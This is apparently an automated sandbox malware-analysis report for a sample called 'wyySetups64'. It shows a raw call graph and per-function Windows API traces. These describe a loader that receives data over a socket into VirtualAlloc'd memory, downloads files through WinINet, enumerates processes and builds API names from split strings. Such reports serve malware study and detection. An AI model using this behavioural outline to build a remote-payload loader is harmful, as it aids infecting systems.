9590->9592 9591->9592 9592->9552 9686 10010030 9593->9686 9596 10010330 GetModuleFileNameA 9597 10002190 8 API calls 9596->9597 9598 10010363 9597->9598 9598->9556 9691 10002620 9599->9691 9601 100020af 9601->9558 9603 10002190 8 API calls 9602->9603 9604 10001873 9603->9604 9701 100016e0 9604->9701 9608 100018a1 9609 100020a0 2 API calls 9608->9609 9610 100018ac 9609->9610 9611 100020a0 2 API calls 9610->9611 9612 100018be 9611->9612 9713 10001600 9612->9713 9616 100018f3 9729 10002f30 9616->9729 9618 10001918 9619 100020c0 2 API calls 9618->9619 9620 1000192c 9619->9620 9621 100020a0 2 API calls 9620->9621 9622 10001937 9621->9622 9623 100020a0 2 API calls 9622->9623 9624 10001946 9623->9624 9625 100020a0 2 API calls 9624->9625 9626 10001958 RegisterClassW 9625->9626 9627 10001750 17 API calls 9626->9627 9628 100019db CreateWindowExW ShowWindow 9627->9628 9629 10001a14 KiUserCallbackDispatcher 9628->9629 9630 10001a28 TranslateMessage DispatchMessageW 9629->9630 9631 10001a3f 9629->9631 9630->9629 9631->9572 9633 100021c1 HandleT _Error_objects 9632->9633 9644 100030f0 9633->9644 9635 100021ea 9636 10001f00 9635->9636 9637 10001f12 Concurrency::task_continuation_context::task_continuation_context 9636->9637 9668 10002fd0 9637->9668 9639 10001f45 9639->9586 9639->9587 9641 10001ed8 _Error_objects 9640->9641 9680 10002990 9641->9680 9645 10003107 Concurrency::task_continuation_context::task_continuation_context 9644->9645 9647 10003111 Concurrency::task_continuation_context::task_continuation_context 9645->9647 9655 100015e0 ?_Xlength_error@std@@YAXPBD 9645->9655 9648 1000313b 9647->9648 9650 10003187 Concurrency::task_continuation_context::task_continuation_context 9647->9650 9656 10002ac0 memmove 9648->9656 9657 10003aa0 9650->9657 9652 100031ae HandleT Concurrency::task_continuation_context::task_continuation_context 9660 10002ac0 memmove 9652->9660 9654 1000315f HandleT Concurrency::task_continuation_context::task_continuation_context 9654->9635 9655->9647 9656->9654 9661 10003bb0 9657->9661 9660->9654 9664 10003c00 9661->9664 9665 10003c10 allocator 9664->9665 9666 10003c30 allocator 6 API calls 9665->9666 9667 10003ac5 9666->9667 9667->9652 9669 10002fe3 9668->9669 9670 1000302f _Min_value 9668->9670 9669->9670 9674 100030a0 memset 9669->9674 9670->9639 9672 10002ff8 9672->9670 9675 10003a20 9672->9675 9674->9672 9676 10003a2c _Min_value 9675->9676 9678 10003a76 9675->9678 9676->9678 9679 10003b20 memchr 9676->9679 9678->9670 9679->9676 9681 100029c5 9680->9681 9682 10002cf0 ?_Xout_of_range@std@@YAXPBD 9681->9682 9683 100029de Concurrency::task_continuation_context::task_continuation_context 9682->9683 9684 100030f0 8 API calls 9683->9684 9685 10001eed 9684->9685 9685->9590 9690 1000ece0 9686->9690 9688 1001004d __stdio_common_vsprintf 9689 10010069 9688->9689 9689->9596 9690->9688 9692 10002637 Concurrency::task_continuation_context::task_continuation_context 9691->9692 9694 10002668 Concurrency::task_continuation_context::task_continuation_context 9692->9694 9695 10002c80 9692->9695 9694->9601 9698 10002e00 9695->9698 9699 10003550 allocator 2 API calls 9698->9699 9700 10002cab 9699->9700 9700->9694 9702 10001f00 2 API calls 9701->9702 9703 100016fc 9702->9703 9704 10001705 9703->9704 9705 10001728 9703->9705 9706 10001ec0 9 API calls 9704->9706 9732 10002210 9705->9732 9708 1000171a 9706->9708 9709 100020c0 9708->9709 9710 100020d2 HandleT Concurrency::task_continuation_context::task_continuation_context 9709->9710 9711 10002620 2 API calls 9710->9711 9712 100020da 9710->9712 9711->9712 9712->9608 9750 100022b0 9713->9750 9715 1000163b SHGetKnownFolderPath 9716 100016b7 9715->9716 9717 1000166a wcstombs 9715->9717 9752 10002080 9716->9752 9718 10002190 8 API calls 9717->9718 9720 10001692 9718->9720 9722 100020c0 2 API calls 9720->9722 9721 100016c4 9726 10002f00 9721->9726 9723 100016a1 9722->9723 9724 100020a0 2 API calls 9723->9724 9725 100016a9 CoTaskMemFree 9724->9725 9725->9721 9781 10002010 9726->9781 9728 10002f17 9728->9616 9813 10002040 9729->9813 9731 10002f47 9731->9618 9733 1000223c HandleT Concurrency::task_continuation_context::task_continuation_context 9732->9733 9736 10003230 9733->9736 9735 1000228e 9735->9708 9737 10003247 Concurrency::task_continuation_context::task_continuation_context 9736->9737 9739 10003251 Concurrency::task_continuation_context::task_continuation_context 9737->9739 9747 100015e0 ?_Xlength_error@std@@YAXPBD 9737->9747 9740 1000327b 9739->9740 9742 100032ab Concurrency::task_continuation_context::task_continuation_context 9739->9742 9748 10002ac0 memmove 9740->9748 9743 10003aa0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 9742->9743 9744 100032d2 HandleT Concurrency::task_continuation_context::task_continuation_context 9743->9744 9749 10002ac0 memmove 9744->9749 9746 1000329d Concurrency::task_continuation_context::task_continuation_context 9746->9735 9747->9739 9748->9746 9749->9746 9751 100022e1 _Error_objects 9750->9751 9751->9715 9755 100026b0 9752->9755 9756 100026c0 HandleT 9755->9756 9759 10002bc0 9756->9759 9758 10002093 9758->9721 9760 10002bd4 Concurrency::task_continuation_context::task_continuation_context 9759->9760 9761 10002c18 9759->9761 9765 10002d50 memmove 9760->9765 9766 10003480 9761->9766 9764 10002bf9 Concurrency::task_continuation_context::task_continuation_context 9764->9758 9765->9764 9767 10003491 Concurrency::task_continuation_context::task_continuation_context 9766->9767 9769 1000349b Concurrency::task_continuation_context::task_continuation_context 9767->9769 9776 100015e0 ?_Xlength_error@std@@YAXPBD 9767->9776 9770 10003aa0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 9769->9770 9771 100034cc HandleT Concurrency::task_continuation_context::task_continuation_context 9770->9771 9777 10002c40 9771->9777 9773 10003509 9774 10002c80 Concurrency::task_continuation_context::task_continuation_context 2 API calls 9773->9774 9775 10003523 Concurrency::task_continuation_context::task_continuation_context 9773->9775 9774->9775 9775->9764 9776->9769 9780 10002ac0 memmove 9777->9780 9779 10002c5a Concurrency::task_continuation_context::task_continuation_context 9779->9773 9780->9779 9782 10002020 HandleT 9781->9782 9785 100026e0 9782->9785 9784 10002039 9784->9728 9786 10002700 Concurrency::task_continuation_context::task_continuation_context 9785->9786 9787 1000274d 9785->9787 9791 10002d50 memmove 9786->9791 9792 10003360 9787->9792 9790 1000272b Concurrency::task_continuation_context::task_continuation_context 9790->9784 9791->9790 9793 10003380 Concurrency::task_continuation_context::task_continuation_context 9792->9793 9795 1000338d Concurrency::task_continuation_context::task_continuation_context 9793->9795 9805 100015e0 ?_Xlength_error@std@@YAXPBD 9793->9805 9796 10003aa0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 9795->9796 9797 100033c7 HandleT Concurrency::task_continuation_context::task_continuation_context 9796->9797 9798 10003447 9797->9798 9799 100033fc HandleT 9797->9799 9800 10002780 memmove 9798->9800 9806 10002780 9799->9806 9804 1000343a Concurrency::task_continuation_context::task_continuation_context 9800->9804 9802 10003429 9803 10002c80 Concurrency::task_continuation_context::task_continuation_context 2 API calls 9802->9803 9803->9804 9804->9790 9805->9795 9811 10002ac0 memmove 9806->9811 9808 1000279a 9812 10002ac0 memmove 9808->9812 9810 100027b1 Concurrency::task_continuation_context::task_continuation_context 9810->9802 9811->9808 9812->9810 9814 1000205a Concurrency::task_continuation_context::task_continuation_context 9813->9814 9815 100026e0 11 API calls 9814->9815 9816 1000206d 9815->9816 9816->9731 9818 100048f8 9817->9818 9819 10002190 8 API calls 9818->9819 9820 1000490e 9819->9820 10075 100046a0 GetModuleFileNameA 9820->10075 9822 10004921 _Smanip _Error_objects 10109 1000b990 9822->10109 9824 10004f87 _Smanip _Error_objects 9825 1000b990 10 API calls 9824->9825 9826 100098a2 9825->9826 10113 10004540 9826->10113 9829 10004540 10 API calls 9830 100098d3 _Error_objects 9829->9830 10119 10004120 9830->10119 10058 10010139 WSACleanup exit 10057->10058 10068 10010152 10057->10068 10059 1001031d 10058->10059 10060 100101f5 freeaddrinfo 10064 10010209 WSACleanup exit 10060->10064 10070 10010222 10060->10070 10061 1001016d socket 10062 10010196 WSACleanup exit 10061->10062 10063 100101af connect 10061->10063 10062->10059 10065 100101d3 closesocket 10063->10065 10066 100101ee 10063->10066 10064->10059 10065->10068 10066->10060 10067 10010229 recv 10069 100102a1 10067->10069 10067->10070 10068->10060 10068->10061 10072 100102a7 10069->10072 10073 100102ab closesocket WSACleanup free exit 10069->10073 10070->10067 10071 10010276 realloc 10070->10071 10074 100102e8 VirtualAlloc memmove 10070->10074 10071->10070 10072->10074 10073->10059 10074->10059 10076 10002190 8 API calls 10075->10076 10077 100046e8 10076->10077 10078 10001ec0 9 API calls 10077->10078 10079 10004716 10078->10079 10080 10001ec0 9 API calls 10079->10080 10081 1000472f 10080->10081 10183 1000ba80 10081->10183 10084 10001ec0 9 API calls 10085 1000475a 10084->10085 10086 10001ec0 9 API calls 10085->10086 10091 10004773 _Error_objects 10086->10091 10087 100047da 10193 1000d1d0 10087->10193 10091->10087 10187 1000bd90 10091->10187 10190 1000bd70 10091->10190 10092 10002f30 11 API calls 10094 10004815 10092->10094 10095 100020a0 2 API calls 10094->10095 10096 10004830 10095->10096 10097 100020a0 2 API calls 10096->10097 10098 1000483c 10097->10098 10099 100020a0 2 API calls 10098->10099 10100 1000484b 10099->10100 10101 100020a0 2 API calls 10100->10101 10102 1000485a 10101->10102 10103 100020a0 2 API calls 10102->10103 10104 10004866 10103->10104 10105 100020a0 2 API calls 10104->10105 10106 10004875 10105->10106 10107 100020a0 2 API calls 10106->10107 10108 10004884 10107->10108 10108->9822 10110 1000b9b0 HandleT 10109->10110 10239 1000d590 10110->10239 10112 1000b9e9 10112->9824 10114 10004571 _Error_objects 10113->10114 10273 1000bb30 10114->10273 10116 10004595 HandleT 10117 100045dd 10116->10117 10118 1000bc00 Concurrency::task_continuation_context::task_continuation_context 10 API calls 10116->10118 10117->9829 10118->10116 10120 1000414a 10119->10120 10305 1000b910 10120->10305 10122 10004168 10127 1000421b _Error_objects 10122->10127 10311 1000b950 10122->10311 10125 10004237 10128 1000b950 10 API calls 10125->10128 10126 1000426c 10130 1000b950 10 API calls 10126->10130 10314 1000cd10 10127->10314 10128->10127 10132 1000429c 10130->10132 10131 1000431d 10318 10004020 MultiByteToWideChar 10131->10318 10133 1000b950 10 API calls 10132->10133 10133->10127 10184 1000ba92 Concurrency::task_continuation_context::task_continuation_context 10183->10184 10199 1000d6f0 10184->10199 10188 10002010 11 API calls 10187->10188 10189 1000bda3 10188->10189 10189->10091 10206 1000bc00 10190->10206 10192 1000bd84 10192->10091 10194 1000d1e5 Concurrency::task_continuation_context::task_continuation_context 10193->10194 10196 1000d208 10194->10196 10228 100015e0 ?_Xlength_error@std@@YAXPBD 10194->10228 10229 1000df80 10196->10229 10198 100047f1 10198->10092 10201 1000d6fe 10199->10201 10203 10004742 10199->10203 10201->10203 10204 10003b20 memchr 10201->10204 10205 1000e0e0 memcmp 10201->10205 10203->10084 10204->10201 10205->10201 10207 1000bc64 10206->10207 10209 1000bc1d Concurrency::task_continuation_context::task_continuation_context 10206->10209 10210 1000d8a0 10207->10210 10209->10192 10211 1000d8c0 Concurrency::task_continuation_context::task_continuation_context 10210->10211 10213 1000d8cd Concurrency::task_continuation_context::task_continuation_context 10211->10213 10223 100015e0 ?_Xlength_error@std@@YAXPBD 10211->10223 10214 10003aa0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10213->10214 10215 1000d907 HandleT Concurrency::task_continuation_context::task_continuation_context 10214->10215 10216 1000d984 10215->10216 10217 1000d93c HandleT 10215->10217 10218 1000bc90 Concurrency::task_continuation_context::task_continuation_context memmove 10216->10218 10224 1000bc90 10217->10224 10222 1000d977 Concurrency::task_continuation_context::task_continuation_context 10218->10222 10220 1000d966 10221 10002c80 Concurrency::task_continuation_context::task_continuation_context 2 API calls 10220->10221 10221->10222 10222->10209 10223->10213 10227 10002ac0 memmove 10224->10227 10226 1000bcaa Concurrency::task_continuation_context::task_continuation_context 10226->10220 10227->10226 10228->10196 10234 1000dfac HandleT Concurrency::task_continuation_context::task_continuation_context 10229->10234 10230 1000e042 HandleT Concurrency::task_continuation_context::task_continuation_context 10237 10002ac0 memmove 10230->10237 10232 1000e08a 10238 10002ac0 memmove 10232->10238 10234->10230 10236 10003aa0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10234->10236 10235 1000e0a1 Concurrency::task_continuation_context::task_continuation_context 10235->10198 10236->10230 10237->10232 10238->10235 10240 1000d5b6 Concurrency::task_continuation_context::task_continuation_context 10239->10240 10243 1000d630 Concurrency::task_continuation_context::task_continuation_context 10240->10243 10247 1000dc50 10240->10247 10243->10112 10248 1000dc5f 10247->10248 10249 1000dc69 10248->10249 10261 1000c520 ?_Xlength_error@std@@YAXPBD 10248->10261 10262 1000e150 10249->10262 10253 1000e7b0 10254 1000e7d4 HandleT 10253->10254 10266 1000eb90 10254->10266 10256 1000d611 10257 1000daf0 10256->10257 10258 1000db09 10257->10258 10259 1000daff 10257->10259 10258->10243 10269 1000c540 10259->10269 10261->10249 10263 1000e183 Concurrency::task_continuation_context::task_continuation_context 10262->10263 10264 10003bb0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10263->10264 10265 1000d5e9 10264->10265 10265->10253 10267 1000eb9f 10266->10267 10268 1000ebbd memmove 10267->10268 10268->10256 10270 1000c566 Concurrency::task_continuation_context::task_continuation_context 10269->10270 10271 1000c5c9 10270->10271 10272 10002e00 allocator 2 API calls 10270->10272 10271->10258 10272->10271 10274 1000bb44 10273->10274 10275 1000bb46 10273->10275 10274->10116 10275->10274 10276 1000bb5e 10275->10276 10278 1000bb8c Concurrency::task_continuation_context::task_continuation_context 10275->10278 10280 1000d790 10276->10280 10278->10274 10293 1000c660 10278->10293 10281 1000d7b0 Concurrency::task_continuation_context::task_continuation_context 10280->10281 10283 1000d7bd Concurrency::task_continuation_context::task_continuation_context 10281->10283 10299 100015e0 ?_Xlength_error@std@@YAXPBD 10281->10299 10284 10003aa0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10283->10284 10285 1000d7f7 HandleT Concurrency::task_continuation_context::task_continuation_context 10284->10285 10286 1000d82c HandleT 10285->10286 10287 1000d86f 10285->10287 10300 1000bbb0 10286->10300 10288 1000bbb0 memmove 10287->10288 10291 1000d862 Concurrency::task_continuation_context::task_continuation_context 10288->10291 10291->10274 10292 10002c80 Concurrency::task_continuation_context::task_continuation_context 2 API calls 10292->10291 10294 1000c677 HandleT Concurrency::task_continuation_context::task_continuation_context 10293->10294 10304 10002ac0 memmove 10294->10304 10296 1000c6b3 Concurrency::task_continuation_context::task_continuation_context 10297 10002c80 Concurrency::task_continuation_context::task_continuation_context 2 API calls 10296->10297 10298 1000c6d5 10297->10298 10298->10274 10299->10283 10303 10002ac0 memmove 10300->10303 10302 1000bbcb 10302->10292 10303->10302 10304->10296 10307 1000b91f 10305->10307 10306 1000b943 10306->10122 10307->10306 10308 1000b936 10307->10308 10324 1000c520 ?_Xlength_error@std@@YAXPBD 10307->10324 10325 1000d430 10308->10325 10341 1000d520 10311->10341 10313 10004209 10313->10125 10313->10126 10313->10127 10316 1000cd45 HandleT 10314->10316 10315 1000cd82 _Error_objects 10315->10131 10316->10315 10361 1000e3a0 10316->10361 10382 10010b54 10318->10382 10324->10308 10326 1000d45d Concurrency::task_continuation_context::task_continuation_context 10325->10326 10327 10003bb0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10326->10327 10328 1000d48f 10327->10328 10333 1000e4c0 10328->10333 10334 1000e4e4 HandleT 10333->10334 10335 1000eb90 memmove 10334->10335 10336 1000d4b5 10335->10336 10337 1000dbb0 10336->10337 10339 1000dbc1 Concurrency::task_continuation_context::task_continuation_context 10337->10339 10338 1000d502 10338->10306 10339->10338 10340 10002e00 allocator 2 API calls 10339->10340 10340->10338 10342 1000d553 10341->10342 10344 1000d545 10341->10344 10345 1000e5f0 10342->10345 10344->10313 10346 1000e61d Concurrency::task_continuation_context::task_continuation_context 10345->10346 10347 1000e65f 10346->10347 10360 1000c520 ?_Xlength_error@std@@YAXPBD 10346->10360 10349 10003bb0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10347->10349 10350 1000e685 HandleT 10349->10350 10351 1000e6f6 10350->10351 10352 1000e6d8 10350->10352 10354 1000e4c0 memmove 10351->10354 10353 1000e4c0 memmove 10352->10353 10357 1000e6f1 10353->10357 10355 1000e70d 10354->10355 10356 1000e4c0 memmove 10355->10356 10356->10357 10358 1000dbb0 2 API calls 10357->10358 10359 1000e791 10358->10359 10359->10344 10360->10347 10362 1000e3cc Concurrency::task_continuation_context::task_continuation_context 10361->10362 10364 1000e40c Concurrency::task_continuation_context::task_continuation_context 10362->10364 10371 100015e0 ?_Xlength_error@std@@YAXPBD 10362->10371 10365 10003aa0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10364->10365 10368 1000e42f Concurrency::task_continuation_context::task_continuation_context 10364->10368 10365->10368 10367 1000e47b Concurrency::task_continuation_context::task_continuation_context 10375 1000ea90 10367->10375 10372 1000eb40 10368->10372 10371->10364 10379 1000ecb0 10372->10379 10376 1000e4ae 10375->10376 10377 1000ea9f 10375->10377 10376->10315 10378 10002620 2 API calls 10377->10378 10378->10376 10380 1000eb90 memmove 10379->10380 10381 1000eb54 10380->10381 10381->10367 10760 10011c6d ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE 11501 1000aaf0 11502 1000d330 8 API calls 11501->11502 11503 1000ab00 11502->11503 11504 1000c160 2 API calls 11503->11504 11505 1000ab0c 11504->11505 11246 100101f0 11247 1001015a 11246->11247 11248 1001031d 11246->11248 11249 100101f5 freeaddrinfo 11247->11249 11250 1001016d socket 11247->11250 11253 10010209 WSACleanup exit 11249->11253 11259 10010222 11249->11259 11251 10010196 WSACleanup exit 11250->11251 11252 100101af connect 11250->11252 11251->11248 11254 100101d3 closesocket 11252->11254 11255 100101ee 11252->11255 11253->11248 11254->11247 11255->11249 11256 10010229 recv 11257 100102a1 11256->11257 11256->11259 11260 100102a7 11257->11260 11261 100102ab closesocket WSACleanup free exit 11257->11261 11258 10010276 realloc 11258->11259 11259->11256 11259->11258 11262 100102e8 VirtualAlloc memmove 11259->11262 11260->11262 11261->11248 11262->11248 11263 d61520 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11311 1000b276 11312 100020a0 2 API calls 11311->11312 11313 1000b285 11312->11313 10930 10004178 10931 10004181 10930->10931 10932 1000b950 10 API calls 10931->10932 10934 1000421b _Error_objects 10931->10934 10933 10004209 10932->10933 10933->10934 10935 10004237 10933->10935 10936 1000426c 10933->10936 10938 1000cd10 10 API calls 10934->10938 10937 1000b950 10 API calls 10935->10937 10939 1000b950 10 API calls 10936->10939 10937->10934 10940 1000431d 10938->10940 10941 1000429c 10939->10941 10943 10004020 5 API calls 10940->10943 10942 1000b950 10 API calls 10941->10942 10942->10934 10944 1000432f 10943->10944 10945 10002190 8 API calls 10944->10945 10946 10004341 10945->10946 10947 100020a0 2 API calls 10946->10947 10948 1000436b 10947->10948 10949 1000b970 2 API calls 10948->10949 10950 1000437a 10949->10950

                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                              Function 00D50032 Relevance: 70.8, APIs: 2, Strings: 38, Instructions: 795memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetNativeSystemInfo.KERNEL32(?), ref: 00D504AE
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 00D504DE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocInfoNativeSystemVirtual
                                                                                                                                                                                                              • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                                                                                                                                                                                              • API String ID: 2032221330-2899676511
                                                                                                                                                                                                              • Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                                                                                                                              • Instruction ID: 6601f719d48952b094e19204eb64ec801f5cd8b10b545eaf248174b32aa51810
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C627B325083858FDB21CF24C840BABBBE4FF94705F18492DEDC99B251E7709948CBA6
                                                                                                                                                                                                              Function 10001BB0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 143networkfilewindowCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • InternetOpenA.WININET(URLDownloader,00000001,00000000,00000000,00000000), ref: 10001BCA
                                                                                                                                                                                                              • InternetOpenUrlA.WININET(?,?,00000000,00000000,80000000,00000000), ref: 10001BE6
                                                                                                                                                                                                              • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,10012458,?,10001BA3,?,?,?), ref: 10001BF8
                                                                                                                                                                                                              • HttpQueryInfoW.WININET(?,20000005,00000000,00000004,00000000), ref: 10001C2D
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 10001C4A
                                                                                                                                                                                                              • InternetReadFile.WININET(?,?,00001000,?), ref: 10001C65
                                                                                                                                                                                                              • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 10001C8E
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 10001D1B
                                                                                                                                                                                                              • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 10001D2B
                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 10001D38
                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 10001D42
                                                                                                                                                                                                              • GetParent.USER32(?), ref: 10001D4C
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 10001D5B
                                                                                                                                                                                                              • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10001D93
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Internet$CloseHandleMessageOpenSend$FileHttpInfoParentQueryReadShowWindowexitfclosefopenfwrite
                                                                                                                                                                                                              • String ID: URLDownloader
                                                                                                                                                                                                              • API String ID: 3413257080-1891997712
                                                                                                                                                                                                              • Opcode ID: 8167bd165008061e034a8e8451ddf05a0f2f7158e41ec6c26d4c78a1f0855317
                                                                                                                                                                                                              • Instruction ID: ddbd601f5f187a188268b5c7d9f2a971705c802d5f1a5a55912b1b5dcc305942
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8167bd165008061e034a8e8451ddf05a0f2f7158e41ec6c26d4c78a1f0855317
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A5109B5D40219ABEB04DFA4CC85FEEB775FF48741F108209F605BA290D774AA90CB61
                                                                                                                                                                                                              Function 1000F260 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 61processCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000F26D
                                                                                                                                                                                                              • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 1000F298
                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(1000D110), ref: 1000F2C1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 1000F2CB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Failed to retrieve first process., xrefs: 1000F2A2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: V01@$??6?$basic_ostream@CloseCreateD@std@@@std@@FirstHandleProcess32SnapshotToolhelp32U?$char_traits@V01@@
                                                                                                                                                                                                              • String ID: Failed to retrieve first process.
                                                                                                                                                                                                              • API String ID: 592929778-1967016982
                                                                                                                                                                                                              • Opcode ID: 98de57343e861626075a39aa984df5a9d5828a3fa4c83e5535eac612fe9e42d8
                                                                                                                                                                                                              • Instruction ID: 0ce586cc59c24ae6f6b9b608917b68c1bdf63cf15262094913b6f28177916ec4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 98de57343e861626075a39aa984df5a9d5828a3fa4c83e5535eac612fe9e42d8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D1196B4900218FFEB10EFB0CD89AAE77B8EF08391F104699E90597155D734EB54EB50
                                                                                                                                                                                                              Function 1000EE80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RpcStringBindingComposeW.RPCRT4(00000000,100124B8,localhost,100124CC,00000000,10001D8E), ref: 1000EEBE
                                                                                                                                                                                                              • RpcBindingFromStringBindingW.RPCRT4(10001D8E,00000000), ref: 1000EED9
                                                                                                                                                                                                              • RpcBindingSetAuthInfoExA.RPCRT4(00000000,00000000,00000006,0000000A,00000000,00000000,00000001), ref: 1000EF10
                                                                                                                                                                                                              • RpcStringFreeW.RPCRT4(10001D8E), ref: 1000EF1A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Binding$String$AuthComposeFreeFromInfo
                                                                                                                                                                                                              • String ID: localhost
                                                                                                                                                                                                              • API String ID: 1126441048-2663516195
                                                                                                                                                                                                              • Opcode ID: c91bc88c3a7059766f5b07bc0c43bf0a72e79487a92db334c44e55e67c91127a
                                                                                                                                                                                                              • Instruction ID: cda66700fc1d67de1566ef6c2ee8939abb6b7c8c1a3f56331cb5e05d924021ce
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c91bc88c3a7059766f5b07bc0c43bf0a72e79487a92db334c44e55e67c91127a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B611D7B4D00209BFEB14CFE4C985BEEBBB4FB08704F108159E605BB280D7B59A54CBA0
                                                                                                                                                                                                              Function 10001A60 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 87windowthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • InitCommonControlsEx.COMCTL32(00000008), ref: 10001A93
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10001A9D
